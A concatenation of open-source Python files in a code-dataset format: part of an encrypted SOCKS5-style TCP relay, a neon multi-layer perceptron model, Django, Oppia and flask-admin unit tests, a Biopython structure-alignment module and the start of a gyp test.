self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except (OSError, IOError) as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
self._update_activity()
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
if self._is_local:
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
self._update_activity()
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
# introduced! mostly likely memory leaks, etc
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._last_time = time.time()
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
loop.add_handler(self._handle_events)
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler):
# set handler to active
now = int(time.time())
if now - handler.last_activity < TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/remove so we invent our own
if self._timeouts:
logging.log(utils.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
# clean up the timeout queue when it gets larger than half
# of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def _handle_events(self, events):
# handle events and dispatch to handlers
for sock, fd, event in events:
if sock:
logging.log(utils.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
continue
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
now = time.time()
if now - self._last_time > TIMEOUT_PRECISION:
self._sweep_timeout()
self._last_time = now
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed listen port %d', self._listen_port)
if not self._fd_to_handlers:
self._eventloop.remove_handler(self._handle_events)
def close(self, next_tick=False):
self._closed = True
if not next_tick:
self._server_socket.close()
| mit |
ml-lab/neon | neon/models/mlp.py | 2 | 9789 | # ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Simple multi-layer perceptron model.
"""
import logging
from neon.backends.backend import Block
from neon.models.model import Model
from neon.util.param import opt_param, req_param
logger = logging.getLogger(__name__)
class MLP(Model):
"""
Fully connected, feed-forward, multi-layer perceptron model
"""
def __init__(self, **kwargs):
self.initialized = False
self.__dict__.update(kwargs)
req_param(self, ['layers', 'batch_size'])
opt_param(self, ['step_print'], -1)
opt_param(self, ['accumulate'], False)
opt_param(self, ['reuse_deltas'], True)
opt_param(self, ['timing_plots'], False)
def link(self, initlayer=None):
for ll, pl in zip(self.layers, [initlayer] + self.layers[:-1]):
ll.set_previous_layer(pl)
self.print_layers()
def initialize(self, backend, initlayer=None):
self.data_layer = self.layers[0]
self.cost_layer = self.layers[-1]
self.class_layer = self.layers[-2]
if not hasattr(self.cost_layer, 'ref_layer'):
self.cost_layer.ref_layer = self.data_layer
if self.initialized:
return
self.backend = backend
kwargs = {"backend": self.backend, "batch_size": self.batch_size,
"accumulate": self.accumulate}
for ll, pl in zip(self.layers, [initlayer] + self.layers[:-1]):
ll.initialize(kwargs)
self.nin_max = max(map(lambda x: x.nin, self.layers[1:-1]))
self.global_deltas = None
if self.reuse_deltas:
self.global_deltas = backend.zeros(
(2 * self.nin_max, self.batch_size),
dtype=self.layers[1].deltas_dtype)
self.global_deltas.name = "delta_pool"
for idx, ll in enumerate(self.layers[1:-1]):
ll.set_deltas_buf(self.global_deltas,
offset=((idx % 2) * self.nin_max))
self.initialized = True
# Make some scratch space for NervanaGPU backend:
if self.backend.__module__ == 'neon.backends.gpu':
self.backend.init_mempool((1, self.batch_size),
dtype=self.layers[1].deltas_dtype)
def fprop(self):
for ll, pl in zip(self.layers, [None] + self.layers[:-1]):
y = None if pl is None else pl.output
ll.fprop(y)
def bprop(self):
for ll, nl in zip(reversed(self.layers),
reversed(self.layers[1:] + [None])):
error = None if nl is None else nl.deltas
ll.bprop(error)
def print_layers(self, debug=False):
printfunc = logger.debug if debug else logger.info
netdesc = 'Layers:\n'
for layer in self.layers:
netdesc += '\t' + str(layer) + '\n'
printfunc("%s", netdesc)
def update(self, epoch):
for layer in self.layers:
layer.update(epoch)
def get_classifier_output(self):
return self.class_layer.output
def print_training_error(self, error, num_batches, partial=False):
rederr = self.backend.reduce_tensor(error)
if self.backend.rank() != 0:
return
if partial is True:
assert self.step_print != 0
logger.info('%d.%d training error: %0.5f', self.epochs_complete,
num_batches / self.step_print - 1, rederr)
else:
errorval = rederr / num_batches
logger.info('epoch: %d, training error: %0.5f',
self.epochs_complete, errorval)
def print_test_error(self, setname, misclass, nrecs):
redmisclass = self.backend.reduce_tensor(misclass)
if self.backend.rank() != 0:
return
misclassval = redmisclass / nrecs
logging.info("%s set misclass rate: %0.5f%%",
setname, 100. * misclassval)
def fit(self, dataset):
"""
Learn model weights on the given datasets.
"""
error = self.backend.zeros((1, 1), dtype=self.cost_layer.weight_dtype)
self.data_layer.init_dataset(dataset)
self.data_layer.use_set('train')
logger.info('commencing model fitting')
while self.epochs_complete < self.num_epochs:
self.backend.begin(Block.epoch, self.epochs_complete)
error.fill(0.0)
mb_id = 1
self.data_layer.reset_counter()
while self.data_layer.has_more_data():
self.backend.begin(Block.minibatch, mb_id)
self.backend.begin(Block.fprop, mb_id)
self.fprop()
self.backend.end(Block.fprop, mb_id)
self.backend.begin(Block.bprop, mb_id)
self.bprop()
self.backend.end(Block.bprop, mb_id)
self.backend.begin(Block.update, mb_id)
self.update(self.epochs_complete)
self.backend.end(Block.update, mb_id)
if self.step_print > 0 and mb_id % self.step_print == 0:
self.print_training_error(self.cost_layer.get_cost(),
mb_id, partial=True)
self.backend.add(error, self.cost_layer.get_cost(), error)
self.backend.end(Block.minibatch, mb_id)
mb_id += 1
self.print_training_error(error, self.data_layer.num_batches)
self.print_layers(debug=True)
self.backend.end(Block.epoch, self.epochs_complete)
self.epochs_complete += 1
self.data_layer.cleanup()
def set_train_mode(self, mode):
for ll in self.layers:
ll.set_train_mode(mode)
def predict_generator(self, dataset, setname):
"""
Generate predicitons and true labels for the given dataset, one
mini-batch at a time.
Agruments:
dataset: A neon dataset instance
setname: Which set to compute predictions for (test, train, val)
Returns:
tuple: on each call will yield a 2-tuple of outputs and references.
The first item is the model probabilities for each class,
and the second item is either the one-hot or raw labels with
ground truth.
See Also:
predict_fullset
"""
self.data_layer.init_dataset(dataset)
assert self.data_layer.has_set(setname)
self.data_layer.use_set(setname, predict=True)
self.data_layer.reset_counter()
nrecs = self.batch_size * 1
outputs = self.backend.empty((self.class_layer.nout, nrecs))
if self.data_layer.has_labels:
reference = self.backend.empty((1, nrecs))
else:
reference = self.backend.empty(outputs.shape)
while self.data_layer.has_more_data():
self.fprop()
outputs = self.get_classifier_output()
reference = self.cost_layer.get_reference()
yield (outputs, reference)
self.data_layer.cleanup()
def predict_fullset(self, dataset, setname):
"""
Generate predicitons and true labels for the given dataset.
Note that this requires enough memory to house the predictions and
labels for the entire dataset at one time (not recommended for large
datasets, see predict_generator instead).
Agruments:
dataset: A neon dataset instance
setname: Which set to compute predictions for (test, train, val)
Returns:
tuple: on each call will yield a 2-tuple of outputs and references.
The first item is the model probabilities for each class,
and the second item is either the one-hot or raw labels with
ground truth.
See Also:
predict_generator
"""
self.data_layer.init_dataset(dataset)
assert self.data_layer.has_set(setname)
self.data_layer.use_set(setname, predict=True)
nrecs = self.batch_size * self.data_layer.num_batches
outputs = self.backend.empty((self.class_layer.nout, nrecs))
if self.data_layer.has_labels:
reference = self.backend.empty((1, nrecs))
else:
reference = self.backend.empty(outputs.shape)
batch = 0
for batch_preds, batch_refs in self.predict_generator(dataset,
setname):
start = batch * self.batch_size
end = start + self.batch_size
outputs[:, start:end] = self.get_classifier_output()
reference[:, start:end] = self.cost_layer.get_reference()
batch += 1
return outputs, reference
def predict_live_init(self, dataset):
self.data_layer.init_dataset(dataset)
for ll in self.layers:
ll.set_train_mode(False)
def predict_live(self):
self.fprop()
return self.get_classifier_output()
| apache-2.0 |
cleophasmashiri/oppia | core/domain/event_services_test.py | 30 | 2433 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for event handling."""
__author__ = 'Sean Lip'
from core.domain import event_services
from core.platform import models
taskqueue_services = models.Registry.import_taskqueue_services()
from core.tests import test_utils
import feconf
from google.appengine.ext import ndb
class NumbersModel(ndb.Model):
number = ndb.IntegerProperty()
class TestEventHandler(event_services.BaseEventHandler):
"""Mock event class for processing events of type 'test_event'."""
EVENT_TYPE = 'test_event'
@classmethod
def _handle_event(cls, number):
NumbersModel(number=number).put()
class EventHandlerUnitTests(test_utils.GenericTestBase):
"""Test basic event handler operations."""
def test_handle_event_method_is_called(self):
self.assertEqual(NumbersModel.query().count(), 0)
TestEventHandler.record(2)
self.assertEqual(NumbersModel.query().count(), 1)
self.assertEqual([
numbers_model.number for numbers_model in NumbersModel.query()
], [2])
class EventHandlerTaskQueueUnitTests(test_utils.GenericTestBase):
"""Test that events go into the correct queue."""
def test_events_go_into_the_events_queue(self):
self.assertEqual(self.count_jobs_in_taskqueue(), 0)
event_services.StartExplorationEventHandler.record(
'eid1', 1, 'sid1', 'session1', {}, feconf.PLAY_TYPE_NORMAL)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.assertEqual(self.count_jobs_in_taskqueue(
queue_name=taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(self.count_jobs_in_taskqueue(
queue_name=taskqueue_services.QUEUE_NAME_DEFAULT), 0)
self.process_and_flush_pending_tasks()
self.assertEqual(self.count_jobs_in_taskqueue(), 0)
| apache-2.0 |
tragiclifestories/django | tests/model_options/test_tablespaces.py | 337 | 5389 | from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.db import connection
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from .models.tablespaces import (
Article, ArticleRef, Authors, Reviewers, Scientist, ScientistRef,
)
def sql_for_table(model):
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(model)
return editor.collected_sql[0]
def sql_for_index(model):
return '\n'.join(connection.schema_editor()._model_indexes_sql(model))
# We can't test the DEFAULT_TABLESPACE and DEFAULT_INDEX_TABLESPACE settings
# because they're evaluated when the model class is defined. As a consequence,
# @override_settings doesn't work, and the tests depend
class TablespacesTests(TestCase):
def setUp(self):
# The unmanaged models need to be removed after the test in order to
# prevent bad interactions with the flush operation in other tests.
self._old_models = apps.app_configs['model_options'].models.copy()
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = True
def tearDown(self):
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = False
apps.app_configs['model_options'].models = self._old_models
apps.all_models['model_options'] = self._old_models
apps.clear_cache()
def assertNumContains(self, haystack, needle, count):
real_count = haystack.count(needle)
self.assertEqual(real_count, count, "Found %d instances of '%s', "
"expected %d" % (real_count, needle, count))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_model(self):
sql = sql_for_table(Scientist).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the index on the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_model(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Scientist),
sql_for_table(ScientistRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_indexed_field(self):
sql = sql_for_table(Article).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
# 1 for the table + 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, 'tbl_tbsp', 3)
# 1 for the index on reference
self.assertNumContains(sql, 'idx_tbsp', 1)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_indexed_field(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Article),
sql_for_table(ArticleRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_many_to_many_field(self):
sql = sql_for_table(Authors).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Authors).lower()
# The ManyToManyField declares no db_tablespace, its indexes go to
# the model's tablespace, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_table(Reviewers).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Reviewers).lower()
# The ManyToManyField declares db_tablespace, its indexes go there.
self.assertNumContains(sql, 'tbl_tbsp', 0)
self.assertNumContains(sql, 'idx_tbsp', 2)
| bsd-3-clause |
Ambuj-UF/ConCat-1.0 | src/Utils/Bio/PDB/StructureAlignment.py | 3 | 3986 | # Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Map the residues of two structures to each other based on a FASTA alignment
file.
"""
from __future__ import print_function
from Bio.Data import SCOPData
from Bio.PDB import Selection
from Bio.PDB.Polypeptide import is_aa
__docformat__ = "restructuredtext en"
class StructureAlignment(object):
"""
This class aligns two structures based on an alignment of their
sequences.
"""
def __init__(self, fasta_align, m1, m2, si=0, sj=1):
"""
Attributes:
- fasta_align --- Alignment object
- m1, m2 --- two models
- si, sj --- the sequences in the Alignment object that
correspond to the structures
"""
l=fasta_align.get_alignment_length()
# Get the residues in the models
rl1=Selection.unfold_entities(m1, 'R')
rl2=Selection.unfold_entities(m2, 'R')
# Residue positions
p1=0
p2=0
# Map equivalent residues to each other
map12={}
map21={}
# List of residue pairs (None if -)
duos=[]
for i in range(0, l):
column=fasta_align.get_column(i)
aa1=column[si]
aa2=column[sj]
if aa1!="-":
# Position in seq1 is not -
while True:
# Loop until an aa is found
r1=rl1[p1]
p1=p1+1
if is_aa(r1):
break
self._test_equivalence(r1, aa1)
else:
r1=None
if aa2!="-":
# Position in seq2 is not -
while True:
# Loop until an aa is found
r2=rl2[p2]
p2=p2+1
if is_aa(r2):
break
self._test_equivalence(r2, aa2)
else:
r2=None
if r1:
# Map residue in seq1 to its equivalent in seq2
map12[r1]=r2
if r2:
# Map residue in seq2 to its equivalent in seq1
map21[r2]=r1
# Append aligned pair (r is None if gap)
duos.append((r1, r2))
self.map12=map12
self.map21=map21
self.duos=duos
def _test_equivalence(self, r1, aa1):
"Test if aa in sequence fits aa in structure."
resname=r1.get_resname()
resname=SCOPData.protein_letters_3to1[resname]
assert(aa1==resname)
def get_maps(self):
"""
Return two dictionaries that map a residue in one structure to
the equivealent residue in the other structure.
"""
return self.map12, self.map21
def get_iterator(self):
"""
Iterator over all residue pairs.
"""
for i in range(0, len(self.duos)):
yield self.duos[i]
if __name__=="__main__":
import sys
from Bio.Alphabet import generic_protein
from Bio import AlignIO
from Bio.PDB import PDBParser
if len(sys.argv) != 4:
print("Expects three arguments,")
print(" - FASTA alignment filename (expect two sequences)")
print(" - PDB file one")
print(" - PDB file two")
sys.exit()
# The alignment
fa=AlignIO.read(open(sys.argv[1]), "fasta", generic_protein)
pdb_file1=sys.argv[2]
pdb_file2=sys.argv[3]
# The structures
p=PDBParser()
s1=p.get_structure('1', pdb_file1)
p=PDBParser()
s2=p.get_structure('2', pdb_file2)
# Get the models
m1=s1[0]
m2=s2[0]
al=StructureAlignment(fa, m1, m2)
# Print aligned pairs (r is None if gap)
for (r1, r2) in al.get_iterator():
print("%s %s" % (r1, r2))
| gpl-2.0 |
jamesbeebop/flask-admin | flask_admin/tests/sqla/test_inlineform.py | 25 | 6641 | # -*- coding: utf-8 -*-
from nose.tools import eq_, ok_, raises
from wtforms import fields
from flask_admin.contrib.sqla import ModelView
from flask_admin.contrib.sqla.fields import InlineModelFormList
from flask_admin.contrib.sqla.validators import ItemsRequired
from . import setup
def test_inline_form():
app, db, admin = setup()
client = app.test_client()
# Set up models and database
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
def __init__(self, name=None):
self.name = name
class UserInfo(db.Model):
__tablename__ = 'user_info'
id = db.Column(db.Integer, primary_key=True)
key = db.Column(db.String, nullable=False)
val = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey(User.id))
user = db.relationship(User, backref=db.backref('info', cascade="all, delete-orphan", single_parent=True))
db.create_all()
# Set up Admin
class UserModelView(ModelView):
inline_models = (UserInfo,)
view = UserModelView(User, db.session)
admin.add_view(view)
# Basic tests
ok_(view._create_form_class is not None)
ok_(view._edit_form_class is not None)
eq_(view.endpoint, 'user')
# Verify form
eq_(view._create_form_class.name.field_class, fields.StringField)
eq_(view._create_form_class.info.field_class, InlineModelFormList)
rv = client.get('/admin/user/')
eq_(rv.status_code, 200)
rv = client.get('/admin/user/new/')
eq_(rv.status_code, 200)
# Create
rv = client.post('/admin/user/new/', data=dict(name=u'äõüxyz'))
eq_(rv.status_code, 302)
eq_(User.query.count(), 1)
eq_(UserInfo.query.count(), 0)
rv = client.post('/admin/user/new/', data={'name': u'fbar', \
'info-0-key': 'foo', 'info-0-val' : 'bar'})
eq_(rv.status_code, 302)
eq_(User.query.count(), 2)
eq_(UserInfo.query.count(), 1)
# Edit
rv = client.get('/admin/user/edit/?id=2')
eq_(rv.status_code, 200)
# Edit - update
rv = client.post('/admin/user/edit/?id=2', data={'name': u'barfoo', \
'info-0-id': 1, 'info-0-key': u'xxx', 'info-0-val':u'yyy'})
eq_(UserInfo.query.count(), 1)
eq_(UserInfo.query.one().key, u'xxx')
# Edit - add & delete
rv = client.post('/admin/user/edit/?id=2', data={'name': u'barf', \
'del-info-0': 'on', 'info-0-id': '1', 'info-0-key': 'yyy', 'info-0-val': 'xxx',
'info-1-id': None, 'info-1-key': u'bar', 'info-1-val' : u'foo'})
eq_(rv.status_code, 302)
eq_(User.query.count(), 2)
eq_(User.query.get(2).name, u'barf')
eq_(UserInfo.query.count(), 1)
eq_(UserInfo.query.one().key, u'bar')
# Delete
rv = client.post('/admin/user/delete/?id=2')
eq_(rv.status_code, 302)
eq_(User.query.count(), 1)
rv = client.post('/admin/user/delete/?id=1')
eq_(rv.status_code, 302)
eq_(User.query.count(), 0)
eq_(UserInfo.query.count(), 0)
def test_inline_form_required():
app, db, admin = setup()
client = app.test_client()
# Set up models and database
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
def __init__(self, name=None):
self.name = name
class UserEmail(db.Model):
__tablename__ = 'user_info'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String, nullable=False, unique=True)
verified_at = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey(User.id))
user = db.relationship(User, backref=db.backref('emails', cascade="all, delete-orphan", single_parent=True))
db.create_all()
# Set up Admin
class UserModelView(ModelView):
inline_models = (UserEmail,)
form_args = {
"emails": {"validators": [ItemsRequired()]}
}
view = UserModelView(User, db.session)
admin.add_view(view)
# Create
rv = client.post('/admin/user/new/', data=dict(name=u'no-email'))
eq_(rv.status_code, 200)
eq_(User.query.count(), 0)
data = {
'name': 'hasEmail',
'emails-0-email': 'foo@bar.com',
}
rv = client.post('/admin/user/new/', data=data)
eq_(rv.status_code, 302)
eq_(User.query.count(), 1)
eq_(UserEmail.query.count(), 1)
def test_inline_form_ajax_fk():
app, db, admin = setup()
# Set up models and database
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
def __init__(self, name=None):
self.name = name
class Tag(db.Model):
__tablename__ = 'tags'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
class UserInfo(db.Model):
__tablename__ = 'user_info'
id = db.Column(db.Integer, primary_key=True)
key = db.Column(db.String, nullable=False)
val = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey(User.id))
user = db.relationship(User, backref=db.backref('info', cascade="all, delete-orphan", single_parent=True))
tag_id = db.Column(db.Integer, db.ForeignKey(Tag.id))
tag = db.relationship(Tag, backref='user_info')
db.create_all()
# Set up Admin
class UserModelView(ModelView):
opts = {
'form_ajax_refs': {
'tag': {
'fields': ['name']
}
}
}
inline_models = [(UserInfo, opts)]
view = UserModelView(User, db.session)
admin.add_view(view)
form = view.create_form()
user_info_form = form.info.unbound_field.args[0]
loader = user_info_form.tag.args[0]
eq_(loader.name, 'userinfo-tag')
eq_(loader.model, Tag)
ok_('userinfo-tag' in view._form_ajax_refs)
def test_inline_form_self():
app, db, admin = setup()
class Tree(db.Model):
id = db.Column(db.Integer, primary_key=True)
parent_id = db.Column(db.Integer, db.ForeignKey('tree.id'))
parent = db.relationship('Tree', remote_side=[id], backref='children')
db.create_all()
class TreeView(ModelView):
inline_models = (Tree,)
view = TreeView(Tree, db.session)
parent = Tree()
child = Tree(parent=parent)
form = view.edit_form(child)
eq_(form.parent.data, parent)
| bsd-3-clause |
baslr/ArangoDB | 3rdParty/V8/V8-5.0.71.39/build/gyp/test/make/gyptest-noload.py | 362 | 2023 | #!/usr/bin/env python
# Copyright (c) 2010 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tests the use of the NO_LOAD flag which makes loading sub .mk files
optional.
"""
# Python 2.5 needs this for the with statement.
from __future__ import with_statement
import os
import TestGyp
test = TestGyp.TestGyp(formats=['make'])
test.run_gyp('all.gyp', chdir='noload')
test.relocate('noload', 'relocate/noload')
